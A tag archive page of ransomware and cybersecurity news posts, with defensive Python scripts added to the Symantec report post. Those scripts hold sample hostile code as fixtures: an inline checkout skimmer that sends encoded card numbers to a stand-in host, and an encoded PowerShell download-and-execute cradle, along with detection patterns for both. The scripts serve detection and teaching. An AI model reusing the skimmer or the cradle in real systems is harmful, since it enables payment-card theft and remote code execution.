Tag Archives: Ransomware

CD PROJEKT RED Hack : Source Codes + Docs Stolen!

CD PROJEKT RED just had their source code and internal documents stolen in a MAJOR HACK, and they may all end up being leaked!

 

CD PROJEKT RED Hack : Source Codes Stolen, Servers Encrypted!

On 9 February 2021, CD PROJEKT RED announced that their data – including source code and internal documents – was stolen in a hack, and could possibly be leaked.

Some devices on their network were also encrypted by the same attackers, but CD PROJEKT RED’s backups remained intact, so the encrypted data can be restored.

CD PROJEKT RED publicly ruled out negotiating with the hackers, or giving in to their demands.

This likely means that their source code and internal documents will eventually be released publicly by the hackers.

The only silver lining – CD PROJEKT RED noted that, to the best of its knowledge, the compromised systems did not contain any personal data of its players or users.

 

CD PROJEKT RED Hack : The Hackers’ Threats

According to the ransom note left on their servers, the hackers stole :

  • FULL source code for Cyberpunk 2077, Witcher 3, GWENT and the unreleased version of Witcher 3.
  • ALL of their internal documents on accounting, administration, legal, HR, investor relations and more

They also claim to have encrypted all of CD PROJEKT RED’s servers, but acknowledged that the company would most likely recover the data from its backups.

The hackers are giving the CD PROJEKT RED team 48 hours to contact them to negotiate.

If there is no agreement, they threaten to sell or leak the source codes, and release their internal documents to the media.

They claim that the internal documents will make CD PROJEKT RED look bad, causing its stock price to fall and its investors to lose trust in the company.

 

CD PROJEKT RED : Official Statement On Hack

This is the official statement by CD PROJEKT RED on the hack :

Yesterday we discovered that we have become a victim of a targeted cyber attack, due to which some of our internal systems have been compromised.

An unidentified actor gained unauthorized access to our internal network, collected certain data belonging to CD PROJEKT capital group, and left a ransom note the content of which we release to the public. Although some devices in our network have been encrypted, our backups remain intact. We have already secured our IT infrastructure and begun restoring the data.

We will not give in to the demands nor negotiate with the actor, being aware that this may eventually lead to the release of the compromised data. We are taking necessary steps to mitigate the consequences of such a release, in particular by approaching any parties that may be affected due to the breach.

We are still investigating the incident, however at this time we can confirm that – to the best of our knowledge – the compromised systems did not contain any personal data of our players or users of our services.

We have already approached the relevant authorities, including law enforcement and the President of the Personal Data Protection Office, as well as IT forensic specialists, and we will closely cooperate with them in order to fully investigate the incident.

 


Support Tech ARP!

If you like our work, you can help support us by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!


Ransomware Warning : 1 in 3 Attacks Target Business Users!

INTERPOL and Kaspersky are urging organisations to protect their data against ransomware, because 1 in 3 attacks target business users!

 

Ransomware Warning : 1 in 3 Attacks Target Business Users!

Recent Kaspersky research revealed that in 2019, WannaCry was still the most prevalent ransomware in circulation, and some 30% of the users targeted by ransomware were business users!

  • 30% of ransomware attacks targeted business users
  • Organisations lost, on average, US$1.46 million in costs, fines and reputational damage in 2019
  • WannaCry attacked 164,433 users in 2019, and accounted for 21% of all ransomware attacks.
  • GandCrab accounted for 11% of attacks, while Stop accounted for 4%.

WannaCry, arguably the world’s most famous ransomware, reached its peak 3 years ago – on 12 May 2017 – but continues to wreak havoc on unsuspecting victims.

GandCrab is famous for its ransomware-as-a-service model, rented out to cybercriminals by its developers. Meanwhile, Stop spreads through compromised software and websites, as well as adware.

 

Ransomware : How To Protect Your Business

Here are some tips that Kaspersky is recommending to stay protected against ransomware :

  • Explain to employees how following simple rules can help a company avoid ransomware incidents.
  • Always have fresh back-up copies of your files so you can replace them in case they are lost (e.g. due to malware or a broken device).
  • Don’t just rely on a physical backup, but also store your backup in the cloud for greater reliability.
  • Always update your operating system and software to eliminate recent vulnerabilities.
  • Use security software with anti-ransomware and exploit-prevention features, which can stop ransomware from exploiting vulnerabilities in software and applications. This is especially important for users who continue to run Windows 7, which no longer receives security updates.

And if a corporate device is encrypted by ransomware, please remember that the attack is a criminal offence. You should NOT pay the ransom.

Instead, report the ransomware attack to your local law enforcement agency, and look for a decryptor that may work for you. Some are available for FREE: the No More Ransom project, run by Europol together with Kaspersky and other security vendors, hosts free decryptors for many ransomware families.

 


Acronis Cyber Protect : What Does It Offer?

Acronis Cyber Protect claims to be the “world’s first complete cyber protection solution” for businesses and Managed Service Providers (MSPs).

Let’s take a look at what Acronis Cyber Protect offers!

 

Acronis Cyber Protect : What Is It?

Acronis Cyber Protect is a new cyber protection solution, which combines three key features :

  • Backup and Recovery : to allow reliable recovery of data, apps and systems
  • Malware Protection : to defend data with anti-malware and anti-ransomware protection
  • Security Controls : save IT resources with a simplified but comprehensive endpoint management toolkit

 

Acronis Cyber Protect : Business Benefits

This is what Acronis Cyber Protect promises to offer businesses :

Benefit #1 : Data Availability

Create regular, reliable backups of your data automatically and store them securely so they are instantly available whenever needed.

Benefit #2 : Fast Remediation

Restore data to any device – servers, workstations, VMs, and mobile devices – using full reimage, granular restore, or Instant Restore.

Benefit #3 : Downtime Prevention

Avoid the kind of costly system downtime that’s caused by ransomware, configuration errors, unpatched vulnerabilities, or faulty hardware.

Benefit #4 : Lower TCO

Improve performance, internal SLAs, and IT efficiencies so you can focus on important tasks, while simplifying training and maintenance.

Benefit #5 : Streamlined Protection

Eliminate complexity from your operations with one solution that integrates data protection, malware prevention, and security controls.

 

Acronis Cyber Protect : MSP Benefits

This is what Acronis Cyber Protect promises to offer Managed Service Providers (MSPs) :

Benefit #1 : Improved Profitability

Attract new business, upsell existing customers, and improve your ARPU by offering a full range of superior data protection services.

Benefit #2 : Easier SLA Compliance

Ensure that you are meeting your SLA requirements by helping customers avoid downtime and enabling immediate restores when needed.

Benefit #3 : Greater Cost Control

Reduce administrative costs by using one tool for all tasks – backups, onboarding, monitoring, managing, assistance, and reporting.

Benefit #4 : Decreased Churn

Keep your existing customers happy and satisfied so they come back for more – generating greater financial stability for your business.

 

Acronis Cyber Protect : Availability + Promotion

Acronis Cyber Protect has yet to be released, but you can request Early Access.

Acronis is also offering Cyber Protect at the same cost as Acronis Cyber Backup Cloud for all service providers until July 31, 2020.

 


Microsoft : Cybersecurity Trends + How To Stay Safe In 2020!

As part of Safer Internet Day (SID), Antony Cook from Microsoft shared the key cybersecurity trends in 2020, and how we can stay safe against those dangers.

Even if we are experienced techies, it is enlightening to find out what Microsoft believes are the cybersecurity threats that we should be looking out for in 2020.

 

Microsoft : Key Cybersecurity Trends In 2020!

Cybersecurity Trend #1 : Less Ransomware But More Attacks

Ransomware has declined in recent years, dropping more than 60% from its peak. But Microsoft sees a rise in other types of cyberattacks.

Attackers have learned that ransomware attracts too much attention from law enforcement, and organisations have gotten better at backing up their data.

So hackers are moving on to other activities like cryptocurrency-mining malware and phishing, where they can profit more easily with less attention.

Cybersecurity Trend #2 : Mining Malware Will Be Big!

Attackers are usually acting for financial gain, so they will make big bets on cryptocurrency, especially Bitcoin.

They will focus more on mining malware, which lets them use your computer to mine cryptocurrency without being detected.

Coin mining software is easily available, and cybercriminals have embedded miners into many widely-shared and widely-used applications. They are also trying to deliver this malware through websites that illegally stream copyrighted content like the latest movies.

Cybersecurity Trend #3 : Embedded Threats

Attackers are now more sophisticated, targeting legitimate and trusted software supply points to deliver malware. There have been many examples of this attack vector :

  • a routine update for a tax accounting application,
  • popular freeware tools with backdoors inserted into them,
  • a server management software package,
  • an internet browser extension or site plugin,
  • malicious images which activate scripts when clicked,
  • peer-to-peer applications

In those cases, attackers were able to change the code of legitimate software that people trust and install without hesitation, allowing them to “hitch a ride”.

This attack vector is very dangerous and frustrating, because it takes advantage of the trust that consumers and IT departments already have for legitimate software.

Cybersecurity Trend #4 : Phishing Scams

Phishing continues to be one of the most effective ways to compromise systems, because it targets human decisions and judgment.

Microsoft noted that the percentage of inbound emails that were detected as phishing messages increased 250% throughout 2018, and they expect the final figures for 2019 to show the same trend.

 

Microsoft : How To Stay Safe In 2020!

Here is a summary of what Microsoft believes we should do to stay safe online against cybersecurity threats in 2020 :

Cybersecurity Tip #1 : Practice Good Security Hygiene

  1. Keep your operating system and software updated.
  2. Turn on email and browser protections.
  3. Apply the cybersecurity configurations that your hardware and software vendors recommend.
  4. Stay away from any unfamiliar software or websites.
  5. Use only legitimate software, for all your applications and not just the key ones.

Cybersecurity Tip #2 : Implement More Access Controls

System administrators should implement more access controls, using a Zero Trust or at least a least-privilege model.

This limits an attacker who successfully breaks into your network to a single segment, instead of the whole network.

Cybersecurity Tip #3 : 3-2-1 Backup!

Make sure you create and keep backups, and the cloud is a great tool for this.

Microsoft recommends adhering to the 3-2-1 rule – keep three copies of your data (the original plus two backups) on two different storage types, with at least one copy offsite.

Cybersecurity Tip #4 : Keep Vigilant!

Even if we implement strong cybersecurity measures, we must remain vigilant, and keep an eye out for suspicious activity.

Not just system administrators, but users as well. If you see anything suspicious – report it to your IT department immediately.

It can be anything from a sudden slowdown in your computer’s performance, to strange web pages and images appearing.

 



Acronis True Image 2020 – Everything You Need To Know!

Acronis True Image 2020 was just released, and it is the first personal data protection solution to automate the 3-2-1 backup rule!

Here is EVERYTHING you need to know about Acronis True Image 2020!

 

Acronis True Image 2020

Acronis True Image 2020 is the first major update since True Image 2018 was released two years ago.

With this release, Acronis believes it has successfully addressed all Five Vectors of Cyber Protection – ensuring the safety, accessibility, privacy, authenticity and security of the user’s data (SAPAS).

Like its predecessor, it combines data backup and recovery capabilities, with anti-malware technology. The new release though boasts more than 100 enhancements. Let’s take a look at some of them…

Dual Protection In True Image 2020

Acronis True Image 2020 is the first personal data protection solution to automate the 3-2-1 backup rule.

It will automatically replicate local backups into the cloud, so you will always have an off-site copy for recovery.

After the first backup completes, subsequent backups and their cloud replication run simultaneously.

True Image 2020 Tray Notifications Center

Acronis True Image 2020 now pushes messages about your data to your desktop tray, so you can easily monitor the status of your backups.

In addition to alerting you to urgent issues that require your response, it will also send you tips on how to enhance your computer’s protection.

Back Up Only On Selected Wi-Fi Networks

You will now have greater control, including the ability to select which Wi-Fi networks your backups may be transferred over.

This allows you to avoid costly metered connections, and insecure public networks that could put your data at risk.

Custom Power Management

You will also have control on when your backups will run while you are on battery power. You can :

  • completely prevent backups whenever you are on battery power,
  • set a minimum power level for backups to run

Mac Power Nap Backups!

Acronis True Image 2020 will support Power Nap backups. Enable it, and your Mac will backup its data during its Power Nap.

In addition, any changes to your Mac’s data during its Power Nap will be captured in those backups too!

 

Acronis True Image 2020 Price + Availability

Acronis True Image 2020 is available in three versions, with immediate effect :

Standard Edition

This is a perpetual license designed for customers who store their data on local drives only.

It does not come with cloud storage or cloud-based features. However, you can make local backups of an unlimited number of mobile devices.

Pricing starts at $49.99 for one computer.

Advanced Edition

This is a one-year subscription that includes 250 GB of Acronis Cloud Storage, and access to all cloud-based features.

You will be able to make both local and cloud backups of an unlimited number of mobile devices.

Pricing starts at $49.99 per year for one computer.

Premium Edition

This is a one-year subscription that includes blockchain-based data certification and electronic signature capabilities, as well as 1 TB of Acronis Cloud Storage.

Pricing starts at $99.99 per year for one computer.

All versions include Acronis Active Protection – an AI-powered anti-malware protection – and cover an unlimited number of mobile devices.

 


MegaCortex Ransomware Analysis + Prevention by Sophos!

Sophos just released their analysis of the MegaCortex ransomware whose speed and spread of attack are very worrying! Get the key details about MegaCortex and how to prevent an attack!

 

What Is Megacortex?

MegaCortex is a new ransomware that was rarely seen until it suddenly spiked in volume in May 2019. Similar to infamous ransomware like Ryuk and BitPaymer, it is now spreading rapidly in these countries :

  • US
  • Canada
  • Argentina
  • Italy
  • The Netherlands
  • France
  • Ireland
  • Hong Kong
  • Indonesia
  • Australia

Why Is MegaCortex Dangerous?

Ransomware attacks are usually carried out in 3 ways:

  • Manual attacks
  • Automated attacks
  • Blended attacks

Unlike Ryuk and BitPaymer, MegaCortex is controlled by cybercriminals using more automated tools, and designed to spread infection to many victims at a much faster speed.

 

What Does MegaCortex Demand?

Unlike other ransomware attacks, MegaCortex has no clear ransom demands.

All it does is invite its victims to email the attackers at either of two free email addresses, attaching a file that was dropped onto the victim’s hard disk drive, to request decryption services.

The ransom note includes “a guarantee that your company will never be inconvenienced by us“. On top of that, if the victim pays the ransom, “You will also receive a consultation on how to improve your companies cyber security“.

How sweet of them.

 

How To Protect Against MegaCortex

Sophos recommends the following steps to protect your business from MegaCortex and the threat of ransomware attacks in general :

  • Companies are cautioned to be on the highest alert should they see warning signs of Emotet or Qbot, as there is a strong correlation between MegaCortex and those two malware families (both are trojans commonly used to deliver other payloads, not ransomware in themselves).
  • Place any Remote Desktop Protocol (RDP) hosts behind a Virtual Private Network (VPN), rather than exposing them directly to the internet
  • Use two-factor authentication for system logins
  • Regularly back up important and current data to an offline storage device
  • Use anti-ransomware software like Sophos Intercept X Advanced.

 



Secureworks Launches Red Cloak TDR Cybersecurity Service!

Secureworks just launched Red Cloak TDR at Dell Technologies World 2019 in Las Vegas! Here is a primer on the Secureworks Red Cloak TDR cybersecurity service!

 

SecureWorks Launches Red Cloak TDR

At Dell Technologies World 2019, Secureworks, a Dell Technologies subsidiary, unveiled Red Cloak TDR, their software-as-a-service (SaaS) app that allows companies to securely manage their own cybersecurity measures.

Developed with over 20 years of field experience in cybersecurity, Red Cloak TDR offers a new way for companies to detect, investigate and respond to online threats such as malware and ransomware. Unlike many other cybersecurity services, it is aided by deep learning and machine learning.

The AI assistance helps it quickly detect new and unknown online threats, while reducing false alarms. It also helps cybersecurity teams focus on the real or high-risk threats.

 

How Secureworks Red Cloak TDR Will Transform Cybersecurity

Cybersecurity threats can go undetected for hundreds of days in the gaps and disconnected layers of security products. This is particularly problematic with apps and services that are not updated on a daily or even hourly basis.

Red Cloak TDR Is Cloud-Native

As a cloud-native application, it can be quickly updated after investigations reveal a new threat. In addition, the service includes the following features :

  • Intuitive workflows
  • Automation
  • Chat feature
  • Access to Secureworks’ cybersecurity team and network

Software-as-a-Service

As a software-as-a-service (SaaS) app, there is no hassle of installing on-site hardware, or of upgrading software versions. All updates, back-ups and tuning are handled by the Red Cloak TDR service.

The app does not charge by data consumption like some apps, so users are free to process and manage all the security data they need to protect their organisation. The app is also designed to integrate into the organisation’s own control framework.

 



2019 Symantec Internet Security Threat Report Highlights!

Symantec held an exclusive briefing on the newly-released 2019 Symantec Internet Security Threat Report. In this article, we will share with you the full briefing video, as well as highlights from that Symantec cybersecurity report!

 

The 2019 Symantec Internet Security Threat Report

The 2019 Symantec Internet Security Threat Report is the 24th volume published so far. Based on data from Symantec’s Global Intelligence Network, the ISTR is designed to give businesses and the public an overview of the cybersecurity threat landscape.

The Symantec Global Intelligence Network, incidentally, is the world’s largest civilian cybersecurity threat intelligence network. It records events from 12 million attack sensors across more than 157 countries worldwide, blocking 142 million threats every day.

 

The 2019 Symantec ISTR Briefing Highlights

Briefing us on the 2019 Symantec ISTR was Sherif El-Nabawi, Vice-President of Sales Engineering, Symantec APJ; and David Rajoo, Chief Cybersecurity Architect, Symantec ASEAN.

Diminishing Returns Of Ransomware + Cryptojacking

Ransomware, which encrypts and holds data hostage in return for payment in the form of cryptocurrency, has been hit by declining cryptocurrency values as well as increasing adoption of cloud and mobile computing. This led to a 20% drop in infections.

Cryptojacking, in which malware is used to steal computing power from consumers and enterprises to mine cryptocurrency is similarly hit by the drop in cryptocurrency value. Symantec noted that cryptojacking activity declined by 52% in 2018. Even so, it is still a major problem – they blocked 3.5 million attempts in December 2018 alone!

Formjacking Overtakes Ransomware + Cryptojacking

With diminishing returns from ransomware and cryptojacking, cybercriminals now prefer formjacking.

Formjacking is the online equivalent of ATM card skimming: attackers inject malicious JavaScript into an online shopping site’s checkout pages to capture shoppers’ payment card details as they are typed in, and send them to a server the attackers control.

According to Symantec, more than 4,800 websites are compromised with formjacking code every month, and they blocked more than 3.7 million formjacking attacks on endpoints in 2018.

Generally, small and medium retailers are most widely compromised, and a third of the attacks happened during the busiest online shopping period of the year – from November through December.
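As an added illustration (my own code, not from Symantec’s report or any vendor product), the following Python script audits a checkout page for the conditions formjacking depends on: scripts loaded from origins outside an allowlist, external scripts without Subresource Integrity, and inline scripts that read card fields and also contain a primitive for sending data off the page. The HTML, the origin names and the allowlist are constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Script text that touches payment fields ...
CARD_FIELD_RE = re.compile(r"card|cvv|cvc|expir", re.I)
# ... combined with a way to send data out is the shape of a skimmer:
# encode the values and smuggle them out in a request or image load.
EXFIL_RE = re.compile(
    r"XMLHttpRequest|fetch\(|sendBeacon|new Image|\.src\s*=|btoa\(", re.I)


class ScriptCollector(HTMLParser):
    """Collect every <script> on the page with its src, integrity and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "text": ""}

    def handle_data(self, data):
        if self._current is not None:  # inside a <script>; may arrive in chunks
            self._current["text"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit_checkout_page(html, allowed_origins):
    """Return (kind, detail) findings for the scripts on a checkout page."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for s in parser.scripts:
        if s["src"]:
            origin = urlparse(s["src"]).netloc.lower()
            if not origin:
                continue  # same-origin script served by the shop itself
            if origin not in allowed_origins:
                findings.append(("third_party_script", s["src"]))
            if not s["integrity"]:
                # Without SRI, a compromised CDN can swap the file for a skimmer.
                findings.append(("no_sri", s["src"]))
        elif CARD_FIELD_RE.search(s["text"]) and EXFIL_RE.search(s["text"]):
            findings.append(("inline_card_exfil", s["text"].strip()[:60]))
    return findings


# Constructed checkout page: one vetted payment SDK with SRI, one vetted file
# without SRI, one unknown third-party loader, and an inline skimmer.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<form id="payment"><input name="cardNumber"><input name="cvv"></form>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example-pay.invalid/sdk.js"
        integrity="sha384-PLACEHOLDERHASH" crossorigin="anonymous"></script>
<script src="https://cdn.example-pay.invalid/analytics.js"></script>
<script src="https://stats-collector.invalid/loader.js"></script>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var d = btoa(document.getElementsByName('cardNumber')[0].value + '|' +
               document.getElementsByName('cvv')[0].value);
  new Image().src = 'https://stats-collector.invalid/p.gif?d=' + d;
});
</script>
</body></html>
"""

ALLOWED_ORIGINS = {"cdn.example-pay.invalid"}  # placeholder payment provider CDN

if __name__ == "__main__":
    for kind, detail in audit_checkout_page(SAMPLE_CHECKOUT_HTML, ALLOWED_ORIGINS):
        print(f"{kind:20} {detail}")
```

The inline check is deliberately a heuristic: real skimmers obfuscate names and split strings, so in practice this kind of audit is run on a schedule and any change in the set of scripts on a payment page is treated as a finding in its own right. A Content Security Policy that names the allowed script origins turns the allowlist into something the browser enforces.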

Cloud Is The New Weak Point

With the greater adoption of cloud computing, the same security mistakes are happening in the cloud… with exponentially greater consequences. In 2018, more than 70 million records were stolen from poorly-configured AWS S3 buckets.
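Here is an added example (mine, not from Symantec’s report) of the kind of check that catches the S3 mistake described above: a bucket policy that grants access to anonymous callers. It evaluates a policy document offline, the way you would after pulling it with `aws s3api get-bucket-policy`, and also checks the bucket’s Public Access Block settings. The bucket name, account ID and role ARN are placeholders.

```python
import json


def _as_list(value):
    """IAM policy fields may be a single string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def principal_is_anonymous(principal):
    """True for the two spellings that mean 'anyone': "*" and {"AWS": "*"}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def find_public_grants(policy):
    """Return every Allow statement in a bucket policy that applies to anonymous callers.

    A Condition may narrow such a statement (for example to a VPC endpoint), so it
    is reported rather than evaluated: a conditioned public grant still needs review.
    """
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        if not principal_is_anonymous(stmt.get("Principal")):
            continue
        findings.append({
            "sid": stmt.get("Sid", "<no Sid>"),
            "actions": _as_list(stmt.get("Action")),
            "resources": _as_list(stmt.get("Resource")),
            "conditioned": "Condition" in stmt,
        })
    return findings


def public_access_block_ok(config):
    """The account- or bucket-level Public Access Block must have all four flags on."""
    flags = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")
    return all(config.get(flag) is True for flag in flags)


# Constructed policies for a placeholder bucket. The weak one is the classic
# misconfiguration: anyone on the internet can read every object.
WEAK_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "PublicRead",
    "Effect": "Allow",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::customer-exports/*"
  }]
}""")

# The hardened version grants read access to one IAM role only, and denies any
# request that does not use TLS. The Deny is not a public grant, so it is not flagged.
HARDENED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AppRoleRead",
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::123456789012:role/ExportReader"},
      "Action": ["s3:GetObject"],
      "Resource": "arn:aws:s3:::customer-exports/*"
    },
    {
      "Sid": "DenyInsecureTransport",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:*",
      "Resource": ["arn:aws:s3:::customer-exports", "arn:aws:s3:::customer-exports/*"],
      "Condition": {"Bool": {"aws:SecureTransport": "false"}}
    }
  ]
}""")

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, "public grants:", find_public_grants(policy))
    print("Public Access Block complete:", public_access_block_ok({"BlockPublicAcls": True}))
```

Bucket and object ACLs, the other way data becomes public, do not appear in the policy document at all, which is why the Public Access Block check is separate: with all four flags on, S3 refuses public ACLs and public policies regardless of what an operator later writes.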

Hardware vulnerabilities like Meltdown, Spectre and Foreshadow also put cloud services at risk: a tenant exploiting them can read protected memory belonging to other workloads on the same physical server, so data from hundreds of companies could be stolen by a single exploit on a single server.

Living off the Land Attacks On Supply Chain

Supply chain attacks increased by 78% in 2018, and attackers are increasingly Living off the Land (LotL), abusing administrative tools that are already present on the victim’s systems. For example, the use of malicious PowerShell scripts increased by 1,000 percent last year, with Symantec blocking 115,000 of them each month – yet that is still less than 1% of all the PowerShell usage it observes.

These attacks are hard to defend against, because they use the same tools users and organisations need to function. Identifying and blocking them will require the use of advanced detection methods like analytics and machine learning.
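As an added example (my own code, not from Symantec’s report or any product), the following Python triage script shows what a basic detection for malicious PowerShell looks like when run over process-creation command lines, such as those recorded in Windows Event ID 4688 or Sysmon Event ID 1. It decodes `-EncodedCommand` payloads and scores each command line on the traits that PowerShell abuse usually combines, which is how a detector separates the rare malicious use from the bulk of legitimate administration. The sample command lines and the IP address are constructed; the encoded payload is built at run time.

```python
import base64
import re

# Traits that appear individually in legitimate administration but that attackers
# tend to combine: hide the window, skip the profile and execution policy, pass the
# script base64-encoded, then fetch and execute code from the network in memory.
SUSPICIOUS_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    # PowerShell accepts any unambiguous prefix of -EncodedCommand; the common
    # spellings are listed. "-eq" in a normal command does not match (no space).
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\biwr\b", re.I),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_command_line(cmdline):
    """Score one command line; the decoded payload is searched alongside the raw text."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline} {decoded}"
    indicators = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text)]
    return {"command": cmdline, "decoded": decoded,
            "indicators": indicators, "score": len(indicators)}


def triage(command_lines, threshold=2):
    """Keep only command lines that combine at least `threshold` suspicious traits."""
    return [r for r in map(analyse_command_line, command_lines) if r["score"] >= threshold]


# Constructed payload: a download cradle executed in memory (198.51.100.0/24 is a
# documentation range). Encoded the way an attacker passes it to powershell.exe.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed command lines: three routine admin invocations and one attack.
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -NoProfile -File C:\Scripts\Invoke-Inventory.ps1",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Deploy\install.ps1",
    "powershell.exe -Command \"Get-Service | Where-Object Status -eq 'Running'\"",
    "powershell.exe -nop -w hidden -ep bypass -enc " + ENCODED,
]

if __name__ == "__main__":
    for result in triage(SAMPLE_COMMAND_LINES):
        print(result["score"], result["indicators"])
        print("  decoded:", result["decoded"])
```

The threshold is the important design choice: a single trait such as `-ExecutionPolicy Bypass` is everyday deployment tooling and alerting on it alone produces the noise that buries real findings. Obfuscated scripts (string concatenation, `-join`, compression) defeat simple pattern matching on the command line, which is where script-block logging (Event ID 4104) and the analytics the report mentions come in.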

Internet of Things (IoT) Attacks Are Changing

While the volume of attacks on IoT devices remains high and consistent with 2017 levels, their profile is changing. In addition to routers and wireless cameras, attackers now also target smart light bulbs and virtual voice assistants.

Smartphones Are The Greatest Spying Devices

According to Symantec, smartphones are the greatest spying devices ever created. Their research shows that :

  • 45% of the most popular Android apps and 25% of the most popular iOS apps request location tracking,
  • 46% of popular Android apps and 24% of popular iOS apps request permission to access the smartphone camera, and
  • email addresses are shared with 44% of top Android apps and 48% of top iOS apps!

 


Kaspersky Lab Warns Of Malicious Cryptocurrency Mining!

Kaspersky Lab is warning of malicious cryptocurrency mining powered by pirated software and content. Learn more about this new online threat!

 

Kaspersky Lab Warns Of Malicious Cryptocurrency Mining!

Kaspersky Lab has warned that malicious cryptocurrency mining increased by more than 83% in 2018: 5 million users were attacked online in the first three quarters of 2018, compared to 2.7 million users in 2017.

The major driver behind the malicious cryptocurrency mining was the use of unlicensed software and content.

 

Malicious Cryptocurrency Mining

Malicious cryptocurrency mining has overtaken ransomware as the dominant threat in recent years. The number of attacks increased steadily during the first half of 2018, peaking in March with about 1.2 million users attacked.

Kaspersky Lab experts have investigated the regulatory landscape and electricity prices in the top 10 countries targeted by crypto miners and main infection vectors for the popular malware families.

The investigation of malware families revealed that they mainly infected devices by duping users into installing pirated software and unlicensed content.

“Our analysis of the economic background of malicious crypto mining and the reasons for its widespread presence in certain regions revealed a clear correlation: the easier it is to distribute unlicensed software, the more incidents of malicious crypto miner activity were detected. In short, an activity not generally perceived as dangerous: the downloading and installation of dubious software, underpins what is arguably the biggest cyberthreat story of the year – malicious crypto mining,” notes Evgeny Lopatin, security expert at Kaspersky Lab.

Other Key Findings From The Report

  • The total number of users who encountered miners rose by more than 83% from 2,726,491 in 2017 to 5,001,414 in 2018
  • The share of miners detected increased from 5% in 2017 to 8% in 2018
  • The share of miners detected from the overall risk tool detections has risen from 9% in 2017 to 17% in 2018
  • The total number of users who encountered mobile miners also grew by over 5 times from 1,986 in 2017 to 10,242 in 2018.

 

Steps To Reduce Risk Of Infection

  • Always update software on all your devices to prevent miners from exploiting vulnerabilities.
  • Use tools that can automatically detect vulnerabilities and download and install patches.
  • For personal devices, use a reliable consumer security solution and remember to keep key features such as System Watcher switched on.
  • Don’t overlook less obvious targets such as queue management systems, POS terminals and even vending machines.
  • Use application control to track malicious activity in legitimate applications.
  • Specialised devices should run in Default Deny mode, so that only explicitly approved applications can execute.
  • Use dedicated security solution such as Kaspersky Endpoint Security for Business
  • To protect the corporate environment, educate your employees and IT teams to keep sensitive data separate and to restrict access.

 


First Kaspersky Transparency Center Launched In Zurich!

Kaspersky Lab just launched their first Data Processing and Transparency Center in Zurich. This is part of their Global Transparency Initiative that we covered a while back.

Let’s take a look, and find out what this means for Kaspersky Lab and global cybersecurity!

 

The First Kaspersky Transparency Center

Malicious and suspicious files shared by users of Kaspersky Lab products in Europe will be processed in Kaspersky Lab data processing centers in Zurich, the first part of a relocation commitment made by the company in late 2017 under its Global Transparency Initiative.

The move reflects Kaspersky Lab’s determination to assure the integrity and trustworthiness of its products and the data processing center is accompanied by the opening of the company’s first Transparency Center in Zurich.

The relocation of Kaspersky Lab data processing is part of a major infrastructure move designed to increase the resilience of the company’s IT infrastructure to risks of data breaches and supply-chain attacks. It also further proves the trustworthiness of its products, services and internal processes.

 

Threat-Related Data and Malicious Files

From November 13, threat-related data coming from European users will start to be processed in two datacenters. These provide world-class facilities in compliance with industry standards to ensure the highest levels of security.

The data, which users have actively chosen to share with Kaspersky Lab, includes suspicious or previously unknown malicious files and corresponding meta-data that the company’s products send to Kaspersky Security Network (KSN) for automated malware analysis.

Files comprise only part of the data processed by Kaspersky Lab technologies, yet the most important one. Protection of customers’ data, together with the safety and integrity of infrastructure is a top priority for Kaspersky Lab, and that is why the file processing relocation comes first and is expected to be fully accomplished by the end of 2019.

The relocation of other types of data processed by Kaspersky Lab products, consisting of several kinds of anonymized threat and usage statistics, is planned to be conducted during later phases of the Global Transparency Initiative.

 

Kaspersky Lab’s First Transparency Center

The opening of Kaspersky Lab’s first Transparency Center in Zurich enables authorized partners to access reviews of the company’s code, software updates and threat detection rules, along with other activities.

Kaspersky Lab will provide governments and partners with information on its products and their security, including essential and important technical documentation, for external evaluation in a secure environment.

These developments will be followed by the relocation of data processing for other regions and, in phase two, the move of Kaspersky Lab’s software assembly to Zurich.
